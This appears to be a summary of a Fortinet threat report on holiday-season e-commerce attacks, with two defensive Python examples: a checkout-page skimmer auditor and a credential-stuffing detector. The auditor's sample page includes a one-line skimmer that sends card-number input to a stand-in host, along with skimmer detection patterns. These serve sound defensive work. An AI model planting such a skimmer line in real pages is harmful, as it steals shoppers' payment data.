Cyberthreats Targeting the 2025 Holiday Season: What CISOs Need to Know

The 2025 holiday season shows a sharp rise in malicious, holiday-themed and e-commerce spoof domains, massive volumes of stealer-log credentials, and active exploitation of critical vulnerabilities across Magento, Oracle EBS, and WooCommerce. Organizations face industrialized, automated attacker services—AI-driven brute force, instant phishing hosting, and marketplace commoditization—that enable large-scale credential abuse and payment skimming. #Magento #WooCommerce

Keypoints

  • Over the past three months FortiGuard observed >18,000 holiday-themed domains (≥750 confirmed malicious) and >19,000 e-commerce-themed domains (≈2,900 malicious) used for phishing, fake storefronts, and payment-harvesting campaigns.
  • More than 1.57 million account credentials and associated browser artifacts were collected in stealer logs and indexed on underground marketplaces, enabling rapid credential stuffing and account takeover operations.
  • Attackers are actively exploiting high-impact vulnerabilities—CVE-2025-54236 (Adobe/Magento), CVE-2025-61882 (Oracle E-Business Suite), and CVE-2025-47569 (WooCommerce plugin)—to achieve session takeover, RCE, data exfiltration, and disruption of order/inventory systems.
  • Magecart-style JavaScript injection and other payment-skimming techniques remain prevalent, allowing real-time harvesting of checkout payment data from compromised pages.
  • A mature, commoditized ecosystem (AI brute-force frameworks, credential-validation tools, instant phishing hosting, website-cloning services, SEO manipulation packages, and bulk proxy/VPN services) enables attackers to scale and automate holiday campaigns.
  • Monetization channels—stealer-log marketplaces, discounted card dumps/CVV datasets, sales of customer databases, and offers of administrative/FTP access—accelerate cash-out operations and laundering during peak shopping periods.
  • Fortinet recommends proactive measures—patching platforms/plugins, enforcing MFA, bot management, monitoring lookalike domains, scanning for unauthorized scripts/skimmers, and centralized logging—to mitigate holiday-season risks.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Vulnerabilities are being exploited for remote code execution and session takeover (‘this vulnerability is being exploited to achieve session takeover and remote code execution through improper input validation’).
  • [T1110] Brute Force – AI-powered brute-force frameworks handle large volumes of login attempts with human-like timing to enable credential stuffing (‘AI-powered brute-force frameworks now handle large volumes of login attempts with human-like timing and behavior’).
  • [T1078] Valid Accounts – Use of stolen credentials and stealer logs for account takeover and unauthorized purchases (‘more than 1.57 million login accounts… were collected across underground markets’ enabling credential stuffing and account takeover).
  • [T1566] Phishing – Phishing and fraudulent storefronts are used to harvest credentials and payment data (‘These domains support phishing, fraudulent storefronts, gift card scams, and payment-harvesting schemes’).
  • [T1056] Input Capture – Magecart-style JavaScript injection and skimmers capture payment data from checkout pages (‘Magecart-style JavaScript injection remains one of the most persistent and damaging threats, allowing attackers to skim payment data directly from checkout pages’).
  • [T1068] Exploitation for Privilege Escalation – Vulnerabilities and plugin flaws are enabling privilege escalation within e-commerce platforms (‘vulnerabilities in plugins, templates, and API authentication are enabling payment skimming, XSS exploitation, privilege escalation, and unauthorized file uploads’).
  • [T1105] Ingress Tool Transfer – Unauthorized file uploads and installation of backdoors on CMS platforms are used to persistently exfiltrate data and install skimmers (‘specialized services install payment skimmers or backdoors on CMS-based platforms, enabling long-term data theft’).
  • [T1071] Application Layer Protocol – Command-and-control traffic from infected devices is the behavior the cited defense is meant to block (‘FortiGuard Anti-botnet and C2 Service helps prevent command-and-control communication from infected devices on the network’).
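The T1056 entry above, and the recommendation elsewhere in the report to scan for unauthorized scripts and skimmers, come down to one control: know which scripts your checkout page is supposed to load and alert on anything else. The following is an added example written for this summary, not code from Fortinet or from any storefront platform. It parses a page's HTML, inventories external script hosts and inline script bodies, and compares them with a baseline of approved hosts and SHA-256 hashes of approved inline scripts. Inline scripts outside the baseline that both touch payment-field names and contain a network call are escalated as possible skimmers. The sample page, baseline and hostnames are constructed for the example.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


# Heuristics: field names a skimmer reads, and ways it could ship them out.
PAYMENT_FIELDS = re.compile(r"card[_-]?number|cvv|cvc|expir", re.I)
NETWORK_CALLS = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=", re.I)


def audit_page(html, page_host, baseline_hosts, baseline_inline_hashes):
    """Return findings for every script not covered by the baseline."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname or page_host      # relative src = same origin
        if host not in baseline_hosts:
            findings.append({"type": "unknown_script_host", "detail": src})
    for body in collector.inline:
        digest = hashlib.sha256(body.strip().encode()).hexdigest()
        if digest in baseline_inline_hashes:
            continue
        finding = {"type": "unbaselined_inline_script", "sha256": digest}
        if PAYMENT_FIELDS.search(body) and NETWORK_CALLS.search(body):
            finding["type"] = "possible_skimmer"
        findings.append(finding)
    return findings


# Constructed baseline: the scripts the checkout page is known to ship with.
PAGE_HOST = "shop.acmeshop.example"
BASELINE_HOSTS = {PAGE_HOST, "cdn.acmeshop.example"}
KNOWN_INLINE = ["window.dataLayer = window.dataLayer || [];"]
BASELINE_INLINE_HASHES = {hashlib.sha256(s.encode()).hexdigest() for s in KNOWN_INLINE}

# Constructed sample page: the baseline scripts plus two injected ones.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.acmeshop.example/app.js"></script>
<script src="/static/checkout.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://stat-collect.example/t.js"></script>
</head><body>
<input id="cardNumber"><input id="cvv">
<script>var d=document.getElementById('cardNumber').value;fetch('https://stat-collect.example/c',{method:'POST',body:d});</script>
</body></html>"""


def run_sample():
    return audit_page(SAMPLE_PAGE, PAGE_HOST, BASELINE_HOSTS, BASELINE_INLINE_HASHES)


if __name__ == "__main__":
    for f in run_sample():
        print(f)
```

Run it against a fetch of the live checkout page on a schedule and from outside your own network, since skimmers are sometimes served only to real shoppers; a Content Security Policy with an explicit `script-src` allowlist is the matching preventive control.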

Indicators of Compromise

  • [Domains] Holiday and e-commerce spoofing domains used for phishing and fraudulent storefronts – examples: domains containing ‘BlackFriday’ and ‘FlashSale’ used in >18,000 holiday-themed registrations (≈750 malicious), and >19,000 e-commerce-themed registrations (≈2,900 malicious).
  • [Vulnerabilities] Public CVE identifiers tied to active exploitation of e-commerce infrastructure – examples: CVE-2025-54236 (Adobe/Magento), CVE-2025-61882 (Oracle E-Business Suite), CVE-2025-47569 (WooCommerce plugin).
  • [Credentials / Stealer Logs] Stolen account data and browser artifacts sold on underground markets – examples: >1.57 million login accounts collected in stealer logs, including browser-stored passwords, cookies, session tokens, and autofill data.
  • [Payment Data] Card dumps, CVV datasets, and payment tokens used for fraud and cash-out operations – examples: discounted card dump listings and CVV datasets advertised in ‘holiday sales’ promotions on marketplaces.
  • [Access Credentials / Backend Access] Compromised administrative and FTP access offered for sale enabling direct site control – examples: listings for administrative or FTP access to high-revenue retail sites and millions of leaked WooCommerce records (and other database exports).
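The stealer-log credentials listed above are what feed the credential-stuffing frameworks the report describes, and the report's point that those frameworks now use human-like timing matters for detection: a per-IP rate limit will not fire when attempts arrive thirty seconds apart. The example below is added for this summary and is not Fortinet code; the log format and every address and username in it are constructed. It keys on signals that pacing does not hide: many distinct usernames from one source with a high failure ratio, aggregated both per IP and per /24 so that attempts spread across a bulk proxy range still add up. It also reports the median gap between attempts (to show the rate looks benign) and the accounts that succeeded, which are the ones to force a password reset and session revocation on.

```python
import re
import ipaddress
from collections import defaultdict
from datetime import datetime, timezone
from statistics import median

# Constructed log format for this example: one authentication event per line.
LOG_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")

SAMPLE_LOG = """\
2025-11-28T08:00:00Z ip=198.51.100.5 user=alice result=FAIL
2025-11-28T08:00:12Z ip=198.51.100.5 user=alice result=FAIL
2025-11-28T08:00:30Z ip=198.51.100.5 user=alice result=OK
2025-11-28T08:01:00Z ip=203.0.113.10 user=bob result=FAIL
2025-11-28T08:01:31Z ip=203.0.113.10 user=carol result=FAIL
2025-11-28T08:02:05Z ip=203.0.113.10 user=dave result=FAIL
2025-11-28T08:02:33Z ip=203.0.113.10 user=erin result=OK
2025-11-28T08:03:10Z ip=203.0.113.10 user=frank result=FAIL
2025-11-28T08:03:40Z ip=203.0.113.10 user=grace result=FAIL
2025-11-28T08:05:00Z ip=192.0.2.11 user=heidi result=FAIL
2025-11-28T08:05:20Z ip=192.0.2.12 user=ivan result=FAIL
2025-11-28T08:05:45Z ip=192.0.2.13 user=judy result=FAIL
2025-11-28T08:06:10Z ip=192.0.2.14 user=mallory result=FAIL
2025-11-28T08:06:30Z ip=192.0.2.15 user=niaj result=FAIL
"""


def parse_log(text):
    """Parse log lines into event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(e)
    return events


def _summarize(scope, key, evs, min_users, min_fail_ratio):
    """Build an alert for one source if it crosses the thresholds, else None."""
    users = {e["user"] for e in evs}
    fails = sum(e["result"] == "FAIL" for e in evs)
    ratio = fails / len(evs)
    if len(users) < min_users or ratio < min_fail_ratio:
        return None
    times = sorted(e["ts"] for e in evs)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return {
        "scope": scope, "key": key, "attempts": len(evs),
        "distinct_users": len(users), "fail_ratio": round(ratio, 2),
        "median_gap_s": median(gaps) if gaps else None,
        "succeeded": sorted({e["user"] for e in evs if e["result"] == "OK"}),
    }


def detect_stuffing(events, min_users=5, min_fail_ratio=0.8):
    """Flag sources whose attempt stream spans many accounts and mostly fails.
    IPv4 only; the /24 grouping catches attempts spread across a proxy range."""
    by_ip, by_cidr = defaultdict(list), defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
        net = ipaddress.ip_network(f"{e['ip']}/24", strict=False)
        by_cidr[str(net)].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        a = _summarize("ip", ip, evs, min_users, min_fail_ratio)
        if a:
            alerts.append(a)
    for cidr, evs in by_cidr.items():
        a = _summarize("cidr24", cidr, evs, min_users, min_fail_ratio)
        if a:
            alerts.append(a)
    return alerts


def run_sample():
    return detect_stuffing(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for a in run_sample():
        print(a)
```

In the sample, the single host 203.0.113.10 is flagged on its own even though its attempts are spaced about half a minute apart, while the 192.0.2.0/24 range only becomes visible once its five one-attempt-per-address sources are combined; `succeeded` names the one account where a stolen password worked.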

Read more: https://feeds.fortinet.com/~/929465012/0/fortinet/blog/threat-research~Cyberthreats-Targeting-the-Holiday-Season-What-CISOs-Need-to-Know